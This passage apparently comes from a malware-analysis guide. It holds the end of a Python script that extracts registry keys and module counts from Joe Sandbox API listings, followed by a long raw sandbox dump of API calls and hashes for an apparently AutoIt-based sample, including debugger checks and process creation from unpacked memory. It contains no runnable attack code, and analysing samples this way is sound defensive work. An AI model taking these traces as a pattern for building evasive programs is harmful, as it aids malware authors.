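        if r.name in ("RegOpenKeyExW", "RegCreateKeyExW") and len(r.args) >= 2:
            hive = HIVES.get(r.args[0])
            if hive and r.args[1] != "?":
                keys.add((hive, r.args[1]))
    return sorted(keys)


def calls_by_module(refs: List[ApiRef]) -> Dict[str, int]:
    """Count call sites per module, e.g. to separate CRT (LIBCMT) noise from Win32 APIs."""
    counts: Dict[str, int] = {}
    for r in refs:
        counts[r.module] = counts.get(r.module, 0) + 1
    return counts


# Constructed sample: entries copied in the shape of this section's "APIs" lists.
SAMPLE = r"""APIs
• RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00DFD28B,SwapMouseButtons,00000004,?), ref: 00DFD2BC
• RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00DFD28B,SwapMouseButtons,00000004,?,?,?,?,00DFC865), ref: 00DFD2DD
• RegCloseKey.KERNELBASE(00000000,?,?,00DFD28B,SwapMouseButtons,00000004,?,?,?,?,00DFC865), ref: 00DFD2FF
• _wcscat.LIBCMT ref: 00E52D80
  • Part of subcall function 00DE49FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00DE4A1D
• @_EH4_CallFilterFunc@8.LIBCMT ref: 00E03539
Strings
"""

if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE)
    for hive, key in registry_keys(parsed):
        print(f"{hive}\\{key}")
    print(calls_by_module(parsed))
```

Run it against the text of a whole report to get every resolved registry key per function; entries whose subkey is "?" are dropped because the plugin could not resolve the string, not because the call is benign.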
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3877424927-0
                                                                                                                  • Opcode ID: 25276d1f646da7b76298e578b8e053e7e3b96e54df01e447abe6ae266d0f960a
                                                                                                                  • Instruction ID: f4005aa61a3a68556c2f8fcf794542409173b35a265bae21da5d46083365394f
                                                                                                                  • Opcode Fuzzy Hash: 25276d1f646da7b76298e578b8e053e7e3b96e54df01e447abe6ae266d0f960a
                                                                                                                  • Instruction Fuzzy Hash: 5F51CDB4A00705ABDB24CFB9D88456F77B9AF40324F24972AF425B62D0D7719FD08B51
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DE4517: _fseek.LIBCMT ref: 00DE452F
                                                                                                                    • Part of subcall function 00E2C56D: _wcscmp.LIBCMT ref: 00E2C65D
                                                                                                                    • Part of subcall function 00E2C56D: _wcscmp.LIBCMT ref: 00E2C670
                                                                                                                  • _free.LIBCMT ref: 00E2C4DD
                                                                                                                  • _free.LIBCMT ref: 00E2C4E4
                                                                                                                  • _free.LIBCMT ref: 00E2C54F
                                                                                                                    • Part of subcall function 00E01C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00E07A85), ref: 00E01CB1
                                                                                                                    • Part of subcall function 00E01C9D: GetLastError.KERNEL32(00000000,?,00E07A85), ref: 00E01CC3
                                                                                                                  • _free.LIBCMT ref: 00E2C557
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1552873950-0
                                                                                                                  • Opcode ID: 7f252b61be53e347bf95bf8cf1f18cb687a3b92cb37ed7ac3162ce406380a335
                                                                                                                  • Instruction ID: ba07b642ab557a99fc23e77aa2b63661decce6b0b2d4f76e167b170aaaebf589
                                                                                                                  • Opcode Fuzzy Hash: 7f252b61be53e347bf95bf8cf1f18cb687a3b92cb37ed7ac3162ce406380a335
                                                                                                                  • Instruction Fuzzy Hash: 5E5142B1904258AFDF14AF65DC81BAEB7B9EF48304F10009EF259B7281DB715A80CF69
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 00DFEBB2
                                                                                                                    • Part of subcall function 00DE51AF: _memset.LIBCMT ref: 00DE522F
                                                                                                                    • Part of subcall function 00DE51AF: _wcscpy.LIBCMT ref: 00DE5283
                                                                                                                    • Part of subcall function 00DE51AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00DE5293
                                                                                                                  • KillTimer.USER32(?,00000001,?,?), ref: 00DFEC07
                                                                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00DFEC16
                                                                                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E53C88
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1378193009-0
                                                                                                                  • Opcode ID: 22109ebeafe32b63e48516c110d295111caa531954b9c96ed478adc30e03c3e0
                                                                                                                  • Instruction ID: 6dc29e379c882f4ba4ec568d2ea5996da11f6c003a62496882e0ab03e17ac110
                                                                                                                  • Opcode Fuzzy Hash: 22109ebeafe32b63e48516c110d295111caa531954b9c96ed478adc30e03c3e0
                                                                                                                  • Instruction Fuzzy Hash: AD21DA709047949FE7329B38DC55BE7FFEC9B05349F08148DE79A76241C7B42A888B61
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 00E53725
                                                                                                                    • Part of subcall function 00DE660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00DE53B1,?,?,00DE61FF,?,00000000,00000001,00000000), ref: 00DE662F
                                                                                                                    • Part of subcall function 00DE40A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00DE40C6
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: NamePath$FullLong_memset
                                                                                                                  • String ID: X$t3
                                                                                                                  • API String ID: 3051022977-2341782549
                                                                                                                  • Opcode ID: fd896de0a217aafd45c6e42b42d75683da1a2f0176ca28182091eda0204af118
                                                                                                                  • Instruction ID: 66aa6821247a6a2823460bc2f45226bc260546688db6ff6644569ee1257085ec
                                                                                                                  • Opcode Fuzzy Hash: fd896de0a217aafd45c6e42b42d75683da1a2f0176ca28182091eda0204af118
                                                                                                                  • Instruction Fuzzy Hash: D221C371A10288AFCF01EFA5C8457DEBBF99F89304F00405AE405B7241DBB49A898F71
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00E0395C: __FF_MSGBANNER.LIBCMT ref: 00E03973
                                                                                                                    • Part of subcall function 00E0395C: __NMSG_WRITE.LIBCMT ref: 00E0397A
                                                                                                                    • Part of subcall function 00E0395C: RtlAllocateHeap.NTDLL(01070000,00000000,00000001), ref: 00E0399F
                                                                                                                  • std::exception::exception.LIBCMT ref: 00DFF51E
                                                                                                                  • __CxxThrowException@8.LIBCMT ref: 00DFF533
                                                                                                                    • Part of subcall function 00E06805: RaiseException.KERNEL32(?,?,0000000E,00E96A30,?,?,?,00DFF538,0000000E,00E96A30,?,00000001), ref: 00E06856
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                  • String ID: bad allocation
                                                                                                                  • API String ID: 3902256705-2104205924
                                                                                                                  • Opcode ID: 6a102784d38139b4a1d086a9179d7a5320683b6010e12e0c7d7709ed41b8eda4
                                                                                                                  • Instruction ID: c0b26f7c01c6581b2225d7f9e0e1cf1f06912c2ade72d65f52557221471fb713
                                                                                                                  • Opcode Fuzzy Hash: 6a102784d38139b4a1d086a9179d7a5320683b6010e12e0c7d7709ed41b8eda4
                                                                                                                  • Instruction Fuzzy Hash: 13F0C83150821E67DB04BFD8EC02AEE77EC9F00354F689126FA04F21D1DBB0D69086B5
                                                                                                                  APIs
                                                                                                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 010B92A5
                                                                                                                  • ExitProcess.KERNEL32(00000000), ref: 010B92C4
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2070917198.00000000010B8000.00000040.00000020.00020000.00000000.sdmp, Offset: 010B8000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_10b8000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$CreateExit
                                                                                                                  • String ID: D
                                                                                                                  • API String ID: 126409537-2746444292
                                                                                                                  • Opcode ID: 8e3ba9fc2c51f8adf90e9822168422d2e6d76900810f8c5233ba2e98edbc58fa
                                                                                                                  • Instruction ID: f12314f2bb4e18a1c44bf23fabe2e54be71005b39cc75336b0c484868b8530f4
                                                                                                                  • Opcode Fuzzy Hash: 8e3ba9fc2c51f8adf90e9822168422d2e6d76900810f8c5233ba2e98edbc58fa
                                                                                                                  • Instruction Fuzzy Hash: C1F0FFB294024CABDB60DFE4CC89FEE777CBF04705F008508FB4A9B180DA7496088B61
                                                                                                                  APIs
                                                                                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 00E2C72F
                                                                                                                  • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00E2C746
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Temp$FileNamePath
                                                                                                                  • String ID: aut
                                                                                                                  • API String ID: 3285503233-3010740371
                                                                                                                  • Opcode ID: f3a8c9677990d7775c0bd26553855c696405eb7a0577df348665f105d9dcf621
                                                                                                                  • Instruction ID: 24ab93d604a3cdca306273f719c53613d3db84920b79c88896ab4dc8100cf230
                                                                                                                  • Opcode Fuzzy Hash: f3a8c9677990d7775c0bd26553855c696405eb7a0577df348665f105d9dcf621
                                                                                                                  • Instruction Fuzzy Hash: B3D05E71A0430EAFDB10ABA0EC0EF8B776C9714744F4001A0B650F50B2DAF1E6998B54
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 0fa0b9d3c764e1e405d4c3b8cc8ecfe811ab985a8b7028621cf274ba32374855
                                                                                                                  • Instruction ID: d4ce9264288a54fae777e03637708eb103e115b186381a5035b1eea2368638a7
                                                                                                                  • Opcode Fuzzy Hash: 0fa0b9d3c764e1e405d4c3b8cc8ecfe811ab985a8b7028621cf274ba32374855
                                                                                                                  • Instruction Fuzzy Hash: E3F16B71A043019FC710DF24C885B6EBBE5FF88314F14992DF999AB292DB70E905CB92
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 00DE5022
                                                                                                                  • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00DE50CB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: IconNotifyShell__memset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 928536360-0
                                                                                                                  • Opcode ID: 3a6d6057e48367bc82ed7424b0c5f755a41fe72a4b6c4ed71d83bbe608e3f1ee
                                                                                                                  • Instruction ID: 9794b379383aa7a961c78f2ff8cf1f077ec5edda4607f5f5929b5707a4450c99
                                                                                                                  • Opcode Fuzzy Hash: 3a6d6057e48367bc82ed7424b0c5f755a41fe72a4b6c4ed71d83bbe608e3f1ee
                                                                                                                  • Instruction Fuzzy Hash: 9431D5B0504740CFC721EF36E841697BBE4FF49348F04092EF59A93241E771A948CBA2
APIs
• __FF_MSGBANNER.LIBCMT ref: 00E03973
  • Part of subcall function 00E081C2: __NMSG_WRITE.LIBCMT ref: 00E081E9
  • Part of subcall function 00E081C2: __NMSG_WRITE.LIBCMT ref: 00E081F3
• __NMSG_WRITE.LIBCMT ref: 00E0397A
  • Part of subcall function 00E0821F: GetModuleFileNameW.KERNEL32(00000000,00EA0312,00000104,00000000,00000001,00000000), ref: 00E082B1
  • Part of subcall function 00E0821F: ___crtMessageBoxW.LIBCMT ref: 00E0835F
  • Part of subcall function 00E01145: ___crtCorExitProcess.LIBCMT ref: 00E0114B
  • Part of subcall function 00E01145: ExitProcess.KERNEL32 ref: 00E01154
  • Part of subcall function 00E07C0E: __getptd_noexit.LIBCMT ref: 00E07C0E
• RtlAllocateHeap.NTDLL(01070000,00000000,00000001), ref: 00E0399F
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
• String ID:
• API String ID: 1372826849-0
• Opcode ID: c169b166a891ca78d3c19154edaaadcbc5454415d21dc9bac2ddee88eec09f9a
• Instruction ID: 5fd6f199345c098a1425fc98c6baf8df68bf1eb702017b8e2f75da74faad7249
• Opcode Fuzzy Hash: c169b166a891ca78d3c19154edaaadcbc5454415d21dc9bac2ddee88eec09f9a
• Instruction Fuzzy Hash: 6501F9313452019EE6113B79EC42A6A738C9FC6764F60202AF541FB1D6DFF0ADC046A0
APIs
• CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00E2C385,?,?,?,?,?,00000004), ref: 00E2C6F2
• SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00E2C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00E2C708
• CloseHandle.KERNEL32(00000000,?,00E2C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00E2C70F
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: File$CloseCreateHandleTime
• String ID:
• API String ID: 3397143404-0
• Opcode ID: d0918eb38561f03cb2a2c15ec9013e75b28eb7d40ebf36a3b600cd371f881d59
• Instruction ID: 455fc0b3f5109739943b5a9266b603e11cf457a9776a4fda62468afc53ce2437
• Opcode Fuzzy Hash: d0918eb38561f03cb2a2c15ec9013e75b28eb7d40ebf36a3b600cd371f881d59
• Instruction Fuzzy Hash: 68E08632685224BBD7211B55FC09FCF7B18AB057A0F104110FB24790E097F125158798
APIs
• _free.LIBCMT ref: 00E2BB72
  • Part of subcall function 00E01C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00E07A85), ref: 00E01CB1
  • Part of subcall function 00E01C9D: GetLastError.KERNEL32(00000000,?,00E07A85), ref: 00E01CC3
• _free.LIBCMT ref: 00E2BB83
• _free.LIBCMT ref: 00E2BB95
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
• Instruction ID: 13c8fd1771f2fc375b6c87579e12ae7563bcf31e100771531aa17fbead144547
• Opcode Fuzzy Hash: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
• Instruction Fuzzy Hash: B3E012A164175146EA2865B97E8CEB363CC5F04355714285DB55AFB186CF24F88089A4
APIs
  • Part of subcall function 00DE22A4: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 00DE2303
• GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00DE25A1
• CoInitialize.OLE32(00000000), ref: 00DE2618
• CloseHandle.KERNEL32(00000000), ref: 00E5503A
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: Handle$ClipboardCloseFormatInitializeRegister
• String ID:
• API String ID: 458326420-0
• Opcode ID: c628e2dd18af99839e04e100cabf59ac3e2d377b66a4ea0cdd6ce225a0ff77ca
• Instruction ID: ff786e4af57eb8eda8db5ea9d491585cd75eb0d41c552d3f2aebb9a3a95c00fe
• Opcode Fuzzy Hash: c628e2dd18af99839e04e100cabf59ac3e2d377b66a4ea0cdd6ce225a0ff77ca
• Instruction Fuzzy Hash: 7171C0B89052918E8704EF5BA891695BBE4FB9F380F8151EED119F7272DB30A40CDF24
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: __fread_nolock
• String ID: EA06
• API String ID: 2638373210-3962188686
• Opcode ID: 3660fa37a28d0d374ebdd709842dd3ecb7f4aa30af45b91a8b6f72a25813742c
• Instruction ID: bc3b40f52d4dee305f069842347399a044e9f84e74dd2e07862787371014f0b4
• Opcode Fuzzy Hash: 3660fa37a28d0d374ebdd709842dd3ecb7f4aa30af45b91a8b6f72a25813742c
• Instruction Fuzzy Hash: 4901B5729042587EDB28C7A8C856FEEBBFC9B15305F00859AF592E61C1E5B4A7088B70
APIs
• 745AC8D0.UXTHEME ref: 00DE3A73
  • Part of subcall function 00E01405: __lock.LIBCMT ref: 00E0140B
  • Part of subcall function 00DE3ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00DE3AF3
  • Part of subcall function 00DE3ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00DE3B08
  • Part of subcall function 00DE3D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00DE3AA3,?), ref: 00DE3D45
  • Part of subcall function 00DE3D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00DE3AA3,?), ref: 00DE3D57
  • Part of subcall function 00DE3D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,00EA1148,00EA1130,?,?,?,?,00DE3AA3,?), ref: 00DE3DC8
  • Part of subcall function 00DE3D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00DE3AA3,?), ref: 00DE3E48
• SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00DE3AB3
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: InfoParametersSystem$CurrentDirectory$DebuggerFullNamePathPresent__lock
• String ID:
• API String ID: 3809921791-0
• Opcode ID: 9bc4013c058eb894f6add5cfcea9252dcfc10bfcdb18f6d911f39142daff547b
• Instruction ID: c98200df71c41af30f1fe5e8b8da7520aba7e1cfd7039c5e6a2e97253397c982
• Opcode Fuzzy Hash: 9bc4013c058eb894f6add5cfcea9252dcfc10bfcdb18f6d911f39142daff547b
• Instruction Fuzzy Hash: D91193719083419FC300EF5AEC4592ABBF4EF99750F01895FF584A72B1DB70A589CBA2
APIs
• ___lock_fhandle.LIBCMT ref: 00E0EA29
• __close_nolock.LIBCMT ref: 00E0EA42
  • Part of subcall function 00E07BDA: __getptd_noexit.LIBCMT ref: 00E07BDA
  • Part of subcall function 00E07C0E: __getptd_noexit.LIBCMT ref: 00E07C0E
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: __getptd_noexit$___lock_fhandle__close_nolock
• String ID:
• API String ID: 1046115767-0
• Opcode ID: 702a3213e586bd6cc4dd701b13123732d2a939287debfa0212d8ba155b48c231
• Instruction ID: f128a5147fe2c76528a8ca3667bcf3e57877bc8932572213502d622229554a59
• Opcode Fuzzy Hash: 702a3213e586bd6cc4dd701b13123732d2a939287debfa0212d8ba155b48c231
• Instruction Fuzzy Hash: 5611E972A056108ED711BFA4C8413597AF16F8A331F166B50E4A03F2E2D7B49DC08AA1
APIs
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: __lock_file_memset
• String ID:
• API String ID: 26237723-0
APIs
  • Part of subcall function 00E07C0E: __getptd_noexit.LIBCMT ref: 00E07C0E
• __lock_file.LIBCMT ref: 00E03629
  • Part of subcall function 00E04E1C: __lock.LIBCMT ref: 00E04E3F
• __fclose_nolock.LIBCMT ref: 00E03634
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: __fclose_nolock__getptd_noexit__lock__lock_file
